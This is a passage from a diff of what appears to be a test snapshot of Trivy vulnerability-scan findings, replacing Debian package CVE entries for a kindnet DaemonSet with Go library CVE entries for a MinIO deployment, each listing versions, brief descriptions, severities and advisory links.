"https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", + ], + }, + "category": "Vulnerability", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "faccessat checks wrong group", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "http://www.redhat.com/support/errata/RHSA-2011-1384.html", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "http://www.redhat.com/support/errata/RHSA-2012-0006.html", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/49388", + "value": "https://github.com/golang/go/issues/52313", + }, + { + "type": "URL", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/49778", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "http://www.securitytracker.com/id/1029190", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1025997", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1026103", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1026704", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "http://www.ubuntu.com/usn/USN-1263-1", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-3389", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://bugzilla.novell.com/show_bug.cgi?id=719047", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=737506", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", - "value": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://hermes.opensuse.org/messages/13154861", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'opt/bitnami/common/bin/wait-for-port' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20210510120138-977fb7262007", + "packageName": "golang.org/x/sys", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", + ], + }, + "category": "Vulnerability", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "faccessat checks wrong group", + "references": [ { "type": "URL", - "value": "https://hermes.opensuse.org/messages/13155432", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2011-3389.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2011-1380.html", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", + "value": "https://github.com/golang/go/issues/52313", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-1263-1", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-3389", + "value": "https://go.dev/cl/400074", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "3.4.1-1+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20305", - "installedVersion": "3.4.1-1", - "packageName": "libhogweed4", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20305", - "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", - "https://linux.oracle.com/cve/CVE-2021-20305.html", - "https://linux.oracle.com/errata/ELSA-2021-1206.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", - "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", - "https://security.gentoo.org/glsa/202105-31", - "https://security.netapp.com/advisory/ntap-20211022-0002/", - "https://ubuntu.com/security/notices/USN-4906-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20305", - "https://www.debian.org/security/2021/dsa-4933", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "nettle: Out of bounds memory access in signature verification", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20305", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20305", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-20305.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-1206.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202105-31", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211022-0002/", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4906-1", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20305", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4933", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "3.4.1-1+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3580", - "installedVersion": "3.4.1-1", - "packageName": "libhogweed4", + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3580", - "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", - "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", - "https://errata.almalinux.org/8/ALSA-2021-4451.html", - "https://errata.rockylinux.org/RLSA-2021:4451", - "https://linux.oracle.com/cve/CVE-2021-3580.html", - "https://linux.oracle.com/errata/ELSA-2022-9221.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", - "https://security.netapp.com/advisory/ntap-20211104-0006/", - "https://ubuntu.com/security/notices/USN-4990-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3580", + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", ], }, "category": "Vulnerability", - "description": "A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "nettle: Remote crash in RSA decryption via manipulated ciphertext", + "name": "handle server errors after sending GOAWAY", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3580", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3580", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4451", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3580.html", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0006/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4990-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3580", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-12290", - "installedVersion": "2.0.5-1+deb10u1", - "packageName": "libidn2-0", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00008.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00009.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290", - "https://gitlab.com/libidn/libidn2/commit/241e8f486134793cb0f4a5b0e5817a97883401f5", - "https://gitlab.com/libidn/libidn2/commit/614117ef6e4c60e1950d742e3edf0a0ef8d389de", - "https://gitlab.com/libidn/libidn2/merge_requests/71", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UFT76Y7OSGPZV3EBEHD6ISVUM3DLARM/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXDKYWFV6N2HHVSE67FFDM7G3FEL2ZNE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ONG3GJRRJO35COPGVJXXSZLU4J5Y42AT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSI4TI2JTQWQ3YEUX5X36GTVGKO4QKZ5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6ZXL2RDNQRAHCMKWPOMJFKYJ344X4HL/", - "https://security.gentoo.org/glsa/202003-63", - "https://ubuntu.com/security/notices/USN-4168-1", - "https://usn.ubuntu.com/4168-1/", - ], - }, - "category": "Vulnerability", - "description": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specified in RFC3490 Section 4.2 when converting A-labels to U-labels. This makes it possible in some circumstances for one domain to impersonate another. By creating a malicious domain that matches a target domain except for the inclusion of certain punycoded Unicode characters (that would be discarded when converted first to a Unicode label and then back to an ASCII label), arbitrary domains can be impersonated.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specifi ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-12290", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00008.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00009.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://gitlab.com/libidn/libidn2/commit/241e8f486134793cb0f4a5b0e5817a97883401f5", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://gitlab.com/libidn/libidn2/commit/614117ef6e4c60e1950d742e3edf0a0ef8d389de", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://gitlab.com/libidn/libidn2/merge_requests/71", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UFT76Y7OSGPZV3EBEHD6ISVUM3DLARM/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXDKYWFV6N2HHVSE67FFDM7G3FEL2ZNE/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ONG3GJRRJO35COPGVJXXSZLU4J5Y42AT/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSI4TI2JTQWQ3YEUX5X36GTVGKO4QKZ5/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6ZXL2RDNQRAHCMKWPOMJFKYJ344X4HL/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202003-63", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4168-1", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4168-1/", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libip4tc2", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://groups.google.com/g/golang-announce", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-11360", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libip4tc2", - "references": [ - "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", - "https://access.redhat.com/security/cve/CVE-2019-11360", - "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", - "https://www.cve.org/CVERecord?id=CVE-2019-11360", - ], - }, - "category": "Vulnerability", - "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "iptables: buffer overflow in 